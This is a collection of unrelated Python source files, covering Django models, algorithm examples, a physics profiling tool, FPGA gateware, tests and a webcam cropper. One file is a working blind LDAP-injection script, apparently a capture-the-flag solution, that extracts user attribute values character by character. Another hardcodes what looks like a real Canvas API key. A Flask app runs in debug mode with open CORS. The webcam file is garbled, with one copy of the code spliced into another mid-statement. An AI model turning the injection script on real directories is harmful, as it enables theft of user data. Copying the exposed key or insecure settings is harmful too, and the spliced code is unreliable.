return MatchQuerySet(self.model, using=self._db)
class Match(models.Model):
"""
model to store matche details played between teams
"""
team1 = models.ForeignKey(Team, related_name=_("team1_metch"), on_delete=models.CASCADE)
team2 = models.ForeignKey(Team, related_name=_("team2_match"), on_delete=models.CASCADE)
date = models.DateField(_("match date"))
winning_stat = models.CharField(_("Winning stats"), max_length=64, default='')
winner = models.ForeignKey(Team, related_name=_("winner_team"), null=True, on_delete=models.CASCADE)
objects = MatchManager()
class Meta:
verbose_name = "Match"
verbose_name_plural = "Matchs"
app_label = "matches"
ordering = ("-date", )
def __unicode__(self):
return "%s" % (self.team1.name + " vs " + self.team2.name)
|
import requests
import string
base_url = 'http://jh2i.com:50019'
empty_size = 0
req = requests.get(base_url + '/?search=asdf')
empty_size = len(req.content)
def attribFinder(attrib):
req = requests.get(base_url + '/?search=*)(' + attrib + '=*')
size = len(req.content)
if size != empty_size:
print('[*] Something found for attribute: ' + attrib)
#attribs = ['dc','o','ou','cn','uid','mail','member','uniquemember','memberof','sAMAccountName', 'primaryGroupToken','primaryGroupID']
attribs = ['buildingname', 'c', 'cn', 'co', 'comment', 'commonname', 'company', 'description', 'distinguishedname', 'dn', 'department', 'displayname', 'facsimiletelephonenumber', 'fax', 'friendlycountryname', 'givenname', 'homephone', 'homepostaladdress', 'info', 'initials', 'ipphone', 'l', 'mail', 'mailnickname', 'rfc822mailbox', 'mobile', 'mobiletelephonenumber', 'name', 'othertelephone', 'ou', 'pager', 'pagertelephonenumber', 'physicaldeliveryofficename', 'postaladdress', 'postalcode', 'postofficebox', 'samaccountname', 'serialnumber', 'sn', 'surname', 'st', 'stateorprovincename', 'street', 'streetaddress', 'telephonenumber', 'title', 'uid', 'url', 'userprincipalname', 'wwwhomepage']
'''
for attrib in attribs:
attribFinder(attrib)
'''
# found attribs: ['cn', 'commonname', 'description', 'displayname', 'givenname', 'mail', 'rfc822mailbox', 'name', 'sn', 'surname']
def valueFinder(username, attrib, prefix=''):
current = prefix
searchSpace = string.ascii_lowercase + string.digits + '@.-/ {}_'
continueSearching = True
while continueSearching:
continueSearching = False
for char in searchSpace:
req = requests.get(base_url + '/?search=' + username + ')(' + attrib + '=' + current + char + '*')
size = len(req.content)
if size != empty_size:
continueSearching = True
current += char
#print('[*] Found next char of attrib: ' + current)
break
print('[*] Finished searching, found attrib value pair ' + attrib + ':' + current + ' for ' + username)
usernames = ['administrator', 'congon4tor', 'george.ward', 'lesley.graham', 'brynn.wilson', 'will.newman', 'justice.ryan', 'mel.simpson', 'sam.fisher', 'reggie.evans', 'angel.campbell', 'terry.molina']
found_attribs = ['commonname', 'description', 'displayname', 'givenname', 'rfc822mailbox', 'name', 'sn', 'surname']
# I removed cn cuz that's useless and mail cuz that's visible
for username in usernames:
print('[*] Searching for ' + username)
for attrib in found_attribs:
valueFinder(username, attrib)
'''
# attempted cheese to find any attrib with flag{ but it's failing rip
for attrib in found_attribs:
print('[*] Searching for ' + attrib)
valueFinder('*', attrib, 'flag')
'''
|
from cryptography.fernet import Fernet
from django.conf import settings
def encryption_key(val):
f = Fernet(settings.CRYPTOGRAPHY_KEY)
encrypted_token = f.encrypt(str(val).encode())
return encrypted_token
def decryption_key(val):
f = Fernet(settings.CRYPTOGRAPHY_KEY)
decrypted_token = f.decrypt(val.encode())
decoded_token = decrypted_token.decode()
return decoded_token
def get_ip(request):
return request.META.get('HTTP_X_FORWARDED_FOR', request.META.get('REMOTE_ADDR', '')).split(',')[0].strip()
def get_browser(request):
return request.META['HTTP_USER_AGENT'] |
def add_two(x, y):
return x + y
lambda x, y: x + y
add_two(10, 5) # 15
(lambda x, y: x + y)(10, 5) # 15
def who(data, identify):
return identify(data)
def my_identifier_function(data):
return data['name']
user = {'name': 'Damiano', 'surname': 'Alves'}
print(who(user, my_identifier_function))
def identifier(data, identify):
return identify(data)
user = {'name': 'Damiano', 'surname': 'Alves '}
print(identifier(user, lambda x: x['name']))
|
g = {
0: (1,),
1: (0,2,3),
2: (1,3,4),
3: (1,2),
4: (2,6),
5: (6,),
6: (5,4)
}
def DFSUtil(v, visited):
# Mark the current node as visited
visited.add(v)
print(v, end=' ')
# Recur for all the vertices adjacent to this vertex
for neighbor in g[v]:
if neighbor not in visited:
DFSUtil(neighbor, visited)
def DFS(v):
visited = set()
DFSUtil(v, visited)
v = 2
print(f'Following is DFS starting from vertex {v}')
DFS(v)
|
from pyfiles.db import position
from pyfiles.model import map
from pony.orm import Required, Optional, db_session
class Overworld(map.Map):
OVERWORLD_SIZE_X = 22
OVERWORLD_SIZE_Y = 22
# Returns the starting position for all characters on the map
@db_session
def get_starting_pos(self) -> (int, int):
_START_POS = position.Position(character=None, pos_x=int(self.map_size_x/2), pos_y=int(self.map_size_y/2))
print ("Overworld starting pos: "+_START_POS.to_string())
return _START_POS
def __init__(self):
super().__init__(self.OVERWORLD_SIZE_X, self.OVERWORLD_SIZE_Y)
# Keep a global instance so we don't have to pass it around
ovrwrld = None
def getOverworld():
global ovrwrld
if ovrwrld is None:
ovrwrld = Overworld()
return ovrwrld
|
from PyPDF2 import PdfFileWriter, PdfFileReader, PdfFileMerger
from reportlab.pdfgen import canvas
import random
import string
import time
from canvasapi import Canvas as Lms
API_URL = "https://canvas.oregonstate.edu/"
# Canvas API key
API_KEY = "1002~m1ShsxLu5bZY6SbSd5KlXjN9ejluixXwRFVYDvVQhGjIMx46dLJqS81NfZtCeTRJ"
def create_watermark(input_pdf, output, watermark, x=random.randint(0,300),y=random.randint(0,500)):
c = canvas.Canvas(watermark)
c.globalAlpha = 0.1;
# Draw the image at x, y. I positioned the x,y to be where i like here
c.drawImage('src_2.png', x, y,width=300,height=300,mask='auto')
# Add some custom text for good measure
lms = Lms(API_URL, API_KEY)
course = lms.get_course(1836569)
c.drawString(30, 30,"Oregonstate: "+str(course))
c.drawString(30, 750,str(int(time.time()) ))
temp = "Spongebob".encode('utf-8')
r = ["0x{:04x}".format(c)[2:] for c in temp ]
code = "".join(r)
code = code.upper()
print(code)
print(code[::-1])
c.drawString(320, 750,code[::-1])
c.save()
watermark_obj = PdfFileReader(watermark)
watermark_page = watermark_obj.getPage(0)
pdf_reader = PdfFileReader(input_pdf)
pdf_writer = PdfFileWriter()
pdf_merger = PdfFileMerger()
for page in range(pdf_reader.getNumPages()):
page = pdf_reader.getPage(page)
page.mergePage(watermark_page)
pdf_writer.addPage(page)
with open(output, 'wb') as out:
pdf_writer.write(out)
if __name__ == '__main__':
a = 'input.pdf'
b = 'watermark.pdf'
c = 'watermark_small.pdf'
create_watermark(\
input_pdf=a,\
output='watermarked.pdf',\
watermark=b,\
x = 150,\
y = 250 \
) |
from django.contrib import admin
from .models import Artist, By, Song, User
admin.site.register(User)
admin.site.register(Song)
admin.site.register(Artist)
admin.site.register(By)
|
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
profilesmry.py
===============
::
an ; ip profilesmry.py
## loads times from scans, after manual adjustment of pfx and cat startswith in __main__
"""
from __future__ import print_function
import os, sys, re, logging, numpy as np, argparse, textwrap
from collections import OrderedDict as odict
log = logging.getLogger(__name__)
from opticks.ana.num import Num
from opticks.ana.base import findfile
from opticks.ana.profile_ import Profile
from opticks.ana.bashnotes import BashNotes
class ProfileSmry(object):
"""
A ProfileSmry is an ordered dict of Profiles, keyed by cat
the Profiles are read from OpticksProfile.npy files written
by Opticks executables.
"""
BASE = "$OPTICKS_EVENT_BASE"
@classmethod
def LoadHit_(cls, htpath):
return np.load(htpath) if os.path.exists(htpath) else None
@classmethod
def Load_(cls, pfx, base, startswith=None):
"""
:param pfx: prefix, see scan-vi, eg scan-ph-0
:param base: directory
:param startswith: used to select the *cat* category of runs
the cat is the path element after evt,
an example of *cat* for scan-ph is cvd_0_rtx_1_100M
:return s: odict keyed by cat with Profile instances
Finds all persisted profiles with selected prefix that meet the startswith selection,
collecting them into an odict which is returned.
"""
assert not base is None
if startswith is None:
select_ = lambda n:True
else:
select_ = lambda n:n.find(startswith) == 0
pass
relp = findfile(base, Profile.NAME ) # list of relative paths beneath base
#log.info("base %s relp %d : NAME %s startswith %s " % (base, len(relp), Profile.NAME, startswith ))
s = odict()
for rp in relp:
path = os.path.join(base, rp)
elem = path.split("/")
cat = elem[elem.index("evt")+1]
sel = select_(cat)
#log.info("path %s cat %s sel %s " % (path, cat, sel) )
if not sel: continue
name = cat
ecat = cat.split("_")
npho = Num.Int( ecat[-1] )
dir_ = os.path.dirname(path)
prof = Profile(dir_, name)
prof.npho = npho
htpath1 = os.path.join(dir_, "1", "ht.npy")
## with multi-event running, currently get all the same hits for tags 1,2,3,...
## the differences are between cats
ht = cls.LoadHit_(htpath1)
nhit = ht.shape[0] if not ht is None else -1
prof.ht = ht
prof.nhit = nhit
ihit = prof.npho/prof.nhit
#print("car %20s npho %9d nhit %9d ihit %5d path %s " % (cat, prof.npho, prof.nhit, ihit, path))
s[cat] = prof
pass
return s
@classmethod
def Base(cls, pfx, base=None):
if base is None:
base = cls.BASE
pass
base = os.path.expandvars(os.path.join(base,pfx))
return base
CATPTN = re.compile("^cvd_(?P<cvd>\d)_rtx_(?P<rtx>\d)_(?P<M>\d*)M$")
@classmethod
def ExamineCats(cls, pfx, base=None):
base = cls.Base(pfx, base)
evtdir = os.path.join(base, "evt")
cats = os.listdir(evtdir)
c = {}
for cat in cats:
m = cls.CATPTN.match(cat)
if not m:
log.error("failed to match %s " % cat )
continue
pass
c[cat] = m.groupdict()
pass
return c
@classmethod
def UCVD(cls, c ):
ucvd = list(set(map(lambda d:d["cvd"], c.values())))
return ucvd
@classmethod
def Load(cls, pfx, base=None, startswith=None, gpufallback=None):
base = cls.Base(pfx, base)
s = cls.Load_(pfx, base, startswith)
ps = cls.FromDict(s, pfx, startswith)
ps.base = base
ps.gpufallback = gpufallback
return ps
@classmethod
def FromDict(cls, s, pfx, startswith):
"""
:param s: raw odict keyed with cat with Profile instance values
Creates ProfileSmry instance comprising arrays populated
from the Profile instances
"""
launch = np.zeros( [len(s), 10], dtype=np.float32 )
alaunch = np.zeros( [len(s) ], dtype=np.float32 )
interval = np.zeros( [len(s), 9], dtype=np.float32 )
ainterval = np.zeros( [len(s)], dtype=np.float32 )
npho = np.zeros( len(s), dtype=np.int32 )
nhit = np.zeros( len(s), dtype=np.int32 )
meta = np.zeros( len(s), dtype=np.object )
for i, kv in enumerate(sorted(s.items(), key=lambda kv:kv[1].npho )):
prof = kv[1]
npho[i] = prof.npho
nhit[i] = prof.nhit
launch[i] = prof.launch
meta[i] = prof.meta
alaunch[i] = np.average( launch[i][1:] )
interval[i] = prof.start_interval
ainterval[i] = np.average( interval[i][1:] )
pass
ps = cls(s)
ps.launch = launch
ps.alaunch = alaunch
ps.interval = interval
ps.ainterval = ainterval
ps.npho = npho
ps.nhit = nhit
ps.creator = "FromDict:%s:%s" % (pfx,startswith )
ps.meta = meta
ps.postinit()
return ps
@classmethod
def FromExtrapolation(cls, npho, seconds_1M=0. ):
"""
See notes/issues/geant4-beamOn-profiling.rst
100 s : for tboolean-box scan-ph
239 s : for full JUNO scan-pf before alignment shakedown
"""
assert seconds_1M > 0, seconds_1M
s = odict()
ps = cls(s)
ps.npho = npho
xtim = (npho/1e6)*seconds_1M
ps.alaunch = xtim
ps.ainterval = xtim
ps.creator = "FromExtrapolation"
return ps
@classmethod
def FromAB(cls, a, b, att="ainterval"):
s = odict()
ps = cls(s)
assert np.all( a.npho == b.npho )
ps.npho = a.npho
ps.ratio = getattr(b,att)/getattr(a, att)
ps.creator = "FromAB"
return ps
@classmethod
def FromAtt(cls, a, num_att="ainterval", den_att="alaunch" ):
s = odict()
ps = cls(s)
ps.npho = a.npho
ps.ratio = getattr(a,num_att)/getattr(a, den_att)
ps.creator = "FromAtt"
return ps
def __init__(self, s):
self.s = s
self.d = odict()
self.gpufallback = "?"
COMMON = r"""
CDeviceBriefAll
CDeviceBriefVis
RTXMode
NVIDIA_DRIVER_VERSION
"""
def commonk(self):
return filter(None,textwrap.dedent(self.COMMON).split("\n"))
def postinit(self):
for k in self.commonk():
self.d[k] = self.metacommon(k)
pass
def descmeta(self):
return "\n".join(["%25s : %s " % (k, v) for k,v in self.d.items()])
def _get_gpu(self):
return self.d.get('CDeviceBriefVis',self.gpufallback)
gpu = property(_get_gpu)
def _get_rtx(self):
RTXMode = self.d.get('RTXMode', None)
assert RTXMode in [None,0,1,2]
e = { None:"?", 0:"OFF", 1:"ON", 2:"ON.Tri" }
return "RTX %s" % e[RTXMode]
rtx = property(_get_rtx)
def _get_autolabel(self):
return "%s, %s" % (self.gpu, self.rtx)
autolabel = property(_get_autolabel)
def metacommon(self, k):
vv = list(set(map( lambda m:m.get(k, None), self.meta )))
assert len(vv) in [0,1], vv
return vv[0] if len(vv) == 1 else None
def desc(self):
return "ProfileSmry %s %s %s " % (self.creator, getattr(self, 'base',""), self.d.get('CDeviceBriefVis','-') )
def __repr__(self):
return "\n".join([self.desc(), self.autolabel, self.descmeta(), Profile.Labels()]+map(lambda kv:repr(kv[1]), sorted(self.s.items(), key=lambda kv:kv[1].npho ) ))
class ProfileMain(object):
@classmethod
def ParseArgs(cls, doc):
parser = argparse.ArgumentParser(__doc__)
default_cvd = os.environ.get("OPTICKS_DEFAULT_INTEROP_CVD", "0") ## hmm this is broken by scan-rsync when looking as scans from another machine
parser.add_argument( "--pfx", default="scan-pf", help="Start of prefix to be appended with a hyphen and integer, beneath which to search for OpticksProfile.npy" )
parser.add_argument( "--g4_seconds_1M", default=239.0, help="Number of seconds for G4 obtained by 1M run of OKG4Test" )
parser.add_argument( "vers", nargs="*", default=[10], type=int, help="Prefix beneath which to search for OpticksProfile.npy" )
parser.add_argument( "--cvd", default=default_cvd, help="CUDA_VISIBLE_DEVICE for the named GPU" )
parser.add_argument( "--gpufallback", default="Quadro_RTX_8000", help="Fallback GPU Name for older scans without this metadata, eg TITAN_RTX" )
args = parser.parse_args()
return cls(args)
def get_pfx(self, v):
return "%s-%s" % ( self.args.pfx, v)
def get_cvd(self, pfx):
"""
When only one cvd in the cats return it,
otherwise return the argument
"""
c = ProfileSmry.ExamineCats(pfx)
ucvd = ProfileSmry.UCVD(c)
if len(ucvd) == 1:
cvd = ucvd[0]
else:
log.info("mixed cvd using argument %s " % pm.cvd )
cvd = pm.cvd
pass
return cvd
def _get_bashcmd(self):
pfx = self.args.pfx # without version tail -0 -1
elem = pfx.split("-")
assert len(elem) == 2
return "%s-;%s-notes" % (elem[0], pfx)
bashcmd = property(_get_bashcmd)
def __init__(self, args):
self.args = args
self.vers = args.vers
self.pfx0 = self.get_pfx(self.vers[0])
self.cvd = args.cvd
self.gpufallback = args.gpufallback
self.g4_seconds_1M = args.g4_seconds_1M
bashcmd = self.bashcmd
log.info("lookup BashNotes from %s " % bashcmd )
self.bnote = BashNotes(bashcmd)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
np.set_printoptions(precision=4, linewidth=200)
pm = ProfileMain.ParseArgs(__doc__)
ps = {}
for v in pm.vers:
pfx = pm.get_pfx(v)
cvd = pm.get_cvd(pfx)
print(" v %d pfx %s " % (v, pfx))
print(" %s " % (pm.bnote(v)))
ps[0] = ProfileSmry.Load(pfx, startswith="cvd_%s_rtx_0" % cvd)
ps[1] = ProfileSmry.Load(pfx, startswith="cvd_%s_rtx_1" % cvd)
#ps[9] = ProfileSmry.FromExtrapolation( ps[0].npho, time_for_1M=239. )
print("\n")
print(ps[0])
print("\n")
print(ps[1])
#print(ps[9])
pass
|
'''video_to_image_and_split_into_four_parts program captures image from webcam and cuts it into four equal parts.
The VideoCapture object is named video.
The webcam port can be changed according to the need by changing the value of "web_cam_port" in line 54 to -1 or 1 for default webcam.
it is usually 0 When the object "video" recieves input, the value of "video.isOpened()" becomes TRUE.
Here "frame" is the video matrix in the while loop.
When the webcam feed is opened, the user can choose to quit by pressing 'q' or the 'ESC' key.
This will delete the video matrix and the program will be terminated.
If the user wants to capture image, press 'SPACE' or 's' Key.
This action will capture the image. The image is saved as 'Capture.png'.
Then the function to crop images will take over and save and display 4 individual images.
The images are created by taking 'Capture.png' into a matrix named'image'.
'Height' and 'Width' of the capture is read and a new matrix named 'crop' is created each time changing the dimensions.
The cropped images will be displayed. Then press 'q' or 'ESC' to close the windows.'''
import cv2
def crop_image_into_four(image_file):
image = cv2.imread(image_file)
height, width = image.shape[:2]
y=0
x=0
h=height//2
w=width//2
crop = image[y:y+h, x:x+w]
cv2.imwrite('Image_1.jpg', crop)
cv2.imshow('Image_1.jpg',crop)
y=height//2
x=0
h=height
w=width//2
crop = image[y:y+h, x:x+w]
cv2.imwrite('Image_2.jpg', crop)
cv2.imshow('Image_2.jpg',crop)
y=0
x=width//2
h=height//2
w=width
crop = image[y:y+h, x:x+w]
cv2.imwrite('Image_3.jpg', crop)
cv2.imshow('Image_3.jpg',crop)
y=height//2
x=width//2
h=height
w=width
crop = image[y:y+h, x:x+w]
cv2.imwrite('Image_4.jpg', crop)
cv2.imshow('Image_4.jpg',crop)
key = cv2.waitKey(0) & 0xFF
if key % 256 == 27 or k == ord('q'):
video.release()
cv2.destroyAllWindows()
web_cam_port=0
video=cv2.VideoCapture(web_cam_port)
while #only using OpenCV.
import cv2
def crop_image_into_four(image_file): # Function to crop image captured into four equal part
image = cv2.imread(image_file) # Converting the image file into a matrix. use 'print(image)' to see the matrix
height, width = image.shape[:2] # The variables height and width contains the number of rows and columns in the image.
# The first portion is cut of from here. The method used is to call the matrix of the required part
# and write it as an image.
y=0
x=0
h=height//2
w=width//2
crop = image[y:y+h, x:x+w]
cv2.imwrite('Image_1.jpg', crop)
cv2.imshow('Image_1.jpg',crop)
# The second portion is cut of from here
y=height//2
x=0
h=height
w=width//2
crop = image[y:y+h, x:x+w]
cv2.imwrite('Image_2.jpg', crop)
cv2.imshow('Image_2.jpg',crop)
# The Third portion is cut of from here
y=0
x=width//2
h=height//2
w=width
crop = image[y:y+h, x:x+w]
cv2.imwrite('Image_3.jpg', crop)
cv2.imshow('Image_3.jpg',crop)
# The fourth Portion
y=height//2
x=width//2
h=height
w=width
crop = image[y:y+h, x:x+w]
cv2.imwrite('Image_4.jpg', crop)
cv2.imshow('Image_4.jpg',crop)
# press 'q' or 'esc' key to close the open images.
key = cv2.waitKey(0) & 0xFF
if key % 256 == 27 or k == ord('q'):
video.release()
cv2.destroyAllWindows()
web_cam_port=0 # use the IDs 0 or -1 to connect to the default webcam. External webcams are usually taken as 1
video=cv2.VideoCapture(web_cam_port) #video object is created
while video.isOpened():
ret,frame = video.read() #frame reads video object. ret is return(boolean value).
if ret==True:
cv2.imshow('Video Palyer',frame)
k = cv2.waitKey(1) & 0xFF
if k == ord('q') or k%256 == 27: #Press q or press Escape key to cancel
# "& 0xFF" is given for 64 bit operating systems. Haven't figured out why......yet.
break
elif k % 256 == 32 or k == ord('s'): #Press Space bar key or 's' key to capture and save an image and cut it.
cv2.imwrite("Capture.png", frame) #image is captured and saved
crop_image_into_four("Capture.png") #function call to cut image into 4 parts.
video.release()
cv2.destroyAllWindows()
else:
break
video.release()
cv2.destroyAllWindows()
:
ret,frame = video.read()
if ret==True:
cv2.imshow('Video Palyer',frame)
k = cv2.waitKey(1) & 0xFF
if k == ord('q') or k%256 == 27:
# "& 0xFF" is given for 64 bit operating systems. Haven't figured out why......yet.
break
elif k % 256 == 32 or k == ord('s'):
cv2.imwrite("Capture.png", frame)
image_file='Capture.png'
crop_image_into_four(image_file)
video.release()
cv2.destroyAllWindows()
else:
break
video.release()
cv2.destroyAllWindows()
|
#Copyright (c) 2017 Joseph D. Steinmeyer (jodalyst)
#Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so, subject
# to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies
# or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
#questions? email me at jodalyst@mit.edu
import time
import math
from flask import Flask, render_template, session, request
from flask_cors import CORS, cross_origin
#Start up Flask server:
app = Flask(__name__, template_folder = './',static_folder='../../src')
#app.config['SECRET_KEY'] = 'secret!' #shhh don't tell anyone. Is a secret
#socketio = SocketIO(app, async_mode = async_mode)
CORS(app,resources={
r'/*/*': {
'origins': '*',
'allow_headers': ['Content-Type', 'Authorization']
}
})
@app.route('/')
def index():
print ("A user connected")
#if thread is None:
# thread = Thread(target=dataThread)
# thread.daemon = True
# thread.start()
return render_template('base.html')
if __name__ == '__main__':
app.run(host="0.0.0.0", debug=True)
|
#!/usr/bin/env python3
#
# This file is part of LUNA.
#
# Copyright (c) 2020 Great Scott Gadgets <info@greatscottgadgets.com>
# SPDX-License-Identifier: BSD-3-Clause
import sys
from amaranth import Signal, Module, Elaboratable, ClockDomain, ClockSignal, Cat, Array
from luna import top_level_cli
from luna.gateware.usb.devices.ila import USBIntegratedLogicAnalyzer
from luna.gateware.usb.devices.ila import USBIntegratedLogicAnalyzerFrontend
class ILAExample(Elaboratable):
""" Gateware module that demonstrates use of the internal ILA. """
def __init__(self):
self.counter = Signal(16)
self.hello = Signal(8)
self.ila = USBIntegratedLogicAnalyzer(
signals=[
self.counter,
self.hello
],
sample_depth=32,
)
def interactive_display(self):
frontend = USBIntegratedLogicAnalyzerFrontend(ila=self.ila)
frontend.interactive_display()
def elaborate(self, platform):
m = Module()
m.submodules += self.ila
# Generate our domain clocks/resets.
m.submodules.car = platform.clock_domain_generator()
# Clock divider / counter.
m.d.sync += self.counter.eq(self.counter + 1)
# Say "hello world" constantly over our ILA...
letters = Array(ord(i) for i in "Hello, world! \r\n")
current_letter = Signal(range(0, len(letters)))
m.d.sync += current_letter.eq(current_letter + 1)
m.d.comb += self.hello.eq(letters[current_letter])
# Set our ILA to trigger each time the counter is at a random value.
# This shows off our example a bit better than counting at zero.
# The trigger should be in the sampling domain (`sync` in this case).
m.d.comb += self.ila.trigger.eq(self.counter == 227)
# Return our elaborated module.
return m
if __name__ == "__main__":
example = top_level_cli(ILAExample)
example.interactive_display()
|
import os
import sys
import unittest
import tempfile
"""
Shifter, Copyright (c) 2016, The Regents of the University of California,
through Lawrence Berkeley National Laboratory (subject to receipt of any
required approvals from the U.S. Dept. of Energy). All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the University of California, Lawrence Berkeley
National Laboratory, U.S. Dept. of Energy nor the names of its
contributors may be used to endorse or promote products derived from this
software without specific prior written permission.`
See LICENSE for full text.
"""
from shifter_imagegw import transfer
class TransferTestCase(unittest.TestCase):
system = {}
def setUp(self):
self.system['host'] = ['localhost']
self.system['ssh'] = {
'username': 'nobody',
'key': 'somefile',
'imageDir': None
}
self.system['local'] = {
'imageDir': None
}
self.system['accesstype'] = 'local'
pass
def tearDown(self):
"""
tear down should stop the worker
"""
pass
def test_shCmd(self):
cmd = transfer._shCmd(self.system, 'echo', 'test')
assert len(cmd) == 2
assert cmd[0] == 'echo'
assert cmd[1] == 'test'
cmd = transfer._shCmd(self.system, 'anotherCommand')
assert len(cmd) == 1
assert cmd[0] == 'anotherCommand'
cmd = transfer._shCmd(self.system)
assert cmd is None
def test_sshCmd(self):
cmd = transfer._sshCmd(self.system, 'echo', 'test')
## expect ssh -i somefile nobody@localhost echo test
assert len(cmd) == 6
assert '|'.join(cmd) == 'ssh|-i|somefile|nobody@localhost|echo|test'
self.system['ssh']['sshCmdOptions'] = ['-t']
cmd = transfer._sshCmd(self.system, 'echo', 'test')
assert len(cmd) == 7
assert '|'.join(cmd) == 'ssh|-i|somefile|-t|nobody@localhost|echo|test'
del self.system['ssh']['sshCmdOptions']
cmd = transfer._sshCmd(self.system)
assert cmd is None
def test_cpCmd(self):
cmd = transfer._cpCmd(self.system, 'a', 'b')
assert len(cmd) == 3
assert '|'.join(cmd) == 'cp|a|b'
def test_scpCmd(self):
cmd = transfer._scpCmd(self.system, 'a', 'b')
assert len(cmd) == 5
assert '|'.join(cmd) == 'scp|-i|somefile|a|nobody@localhost:b'
self.system['ssh']['scpCmdOptions'] = ['-t']
cmd = transfer._scpCmd(self.system, 'a', 'b')
assert len(cmd) == 6
assert '|'.join(cmd) == 'scp|-i|somefile|-t|a|nobody@localhost:b'
del self.system['ssh']['scpCmdOptions']
def inodeCounter(self, ignore, dirname, fnames):
self.inodes += len(fnames)
def test_copyfile_local(self):
tmpPath = tempfile.mkdtemp()
self.system['local']['imageDir'] = tmpPath
self.system['ssh']['imageDir'] = tmpPath
self.system['accesstype'] = 'local'
transfer.copy_file(__file__, self.system)
dir,fname = os.path.split(__file__)
filePath = os.path.join(tmpPath, fname)
assert os.path.exists(filePath)
self.inodes = 0
os.path.walk(tmpPath, self.inodeCounter, None)
assert self.inodes == 1
os.unlink(filePath)
self.inodes = 0
os.path.walk(tmpPath, self.inodeCounter, None)
assert self.inodes == 0
os.rmdir(tmpPath)
def test_copyfile_remote(self):
"""uses mock ssh/scp wrapper to pretend to do the remote
transfer, ensure it is in PATH prior to running test
"""
tmpPath = tempfile.mkdtemp()
self.system['local']['imageDir'] = tmpPath
self.system['ssh']['imageDir'] = tmpPath
self.system['accesstype'] = 'remote'
transfer.copy_file(__file__, self.system)
dir,fname = os.path.split(__file__)
filePath = os.path.join(tmpPath, fname)
assert os.path.exists(filePath)
self.inodes = 0
os.path.walk(tmpPath, self.inodeCounter, None)
assert self.inodes == 1
os.unlink(filePath)
self.inodes = 0
os.path.walk(tmpPath, self.inodeCounter, None)
assert self.inodes == 0
os.rmdir(tmpPath)
def test_copyfile_invalid(self):
tmpPath = tempfile.mkdtemp()
self.system['local']['imageDir'] = tmpPath
self.system['ssh']['imageDir'] = tmpPath
self.system['accesstype'] = 'invalid'
with self.assertRaises(NotImplementedError):
transfer.copy_file(__file__, self.system)
os.rmdir(tmpPath)
def test_copyfile_failtowrite(self):
tmpPath = tempfile.mkdtemp()
self.system['local']['imageDir'] = tmpPath
self.system['ssh']['imageDir'] = tmpPath
self.system['accesstype'] = 'local'
# make directory unwritable
os.chmod(tmpPath, 0555)
with self.assertRaises(OSError):
transfer.copy_file(__file__, self.system)
self.inodes = 0
os.path.walk(tmpPath, self.inodeCounter, None)
assert self.inodes == 0
os.rmdir(tmpPath)
def test_transfer_local(self):
tmpPath = tempfile.mkdtemp()
self.system['local']['imageDir'] = tmpPath
self.system['ssh']['imageDir'] = tmpPath
self.system['accesstype'] = 'local'
transfer.transfer(self.system, __file__)
## make sure transferred file exists
dir,fname = os.path.split(__file__)
filePath = os.path.join(tmpPath, fname)
assert os.path.exists(filePath)
self.inodes = 0
os.path.walk(tmpPath, self.inodeCounter, None)
assert self.inodes == 1
os.unlink(filePath)
dname,fname = os.path.split(__file__)
meta = os.path.join(dname, '__init__.py')
transfer.transfer(self.system, __file__, meta)
self.inodes = 0
os.path.walk(tmpPath, self.inodeCounter, None)
assert self.inodes == 2
filePath = os.path.join(tmpPath, fname)
metaPath = os.path.join(tmpPath, '__init__.py')
os.unlink(filePath)
os.unlink(metaPath)
os.rmdir(tmpPath)
def test_remove_local(self):
(fd,tmpPath) = tempfile.mkstemp()
dname,fname = os.path.split(tmpPath)
self.system['local']['imageDir'] = dname
self.system['ssh']['imageDir'] = dname
self.system['accesstype'] = 'local'
st=transfer.remove_file(fname, self.system)
self.assertEquals(os.path.exists(tmpPath),False)
# TODO: Add a test_remove_remote
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python3
"""
desc: Chunk class, defines how to create and write data to a chunk
Chunks are binary files. The last 20 bytes of a chunk is the header that can be used to seek to specific
documents in the chunk.
"""
import os
import logging
class Chunk:
def __init__(self, chunk_id):
self.chunk_id = chunk_id
self.header = []
self.path = '/data/{0}'.format(chunk_id) # './{}'.format(chunk_id)
self.documents = []
self.log = logging.getLogger()
def create_chunk(self):
"""
Given a chunk_id, create a new chunk file
:return: none
"""
new_chunk = open(self.path, 'wb')
new_chunk.close()
def append_to_chunk(self):
"""
Append documents to chunk, data appended includes document_header and crawler data.
:return: none
"""
if os.path.exists(self.path):
with open(self.path, 'ab') as f:
for document in self.documents:
for value in document['doc_header']:
f.write(value)
f.write(document['doc_data'])
else:
raise Exception('Chunk does not exist')
def create_document(self, link, title, html):
"""
Create document, append document to list for to be writen to chunk one all docs have been created.
:param link: string
:param title: string
:param html: string
:return: list of documents
"""
data = link + title + html
bin_data = data.encode('utf-8')
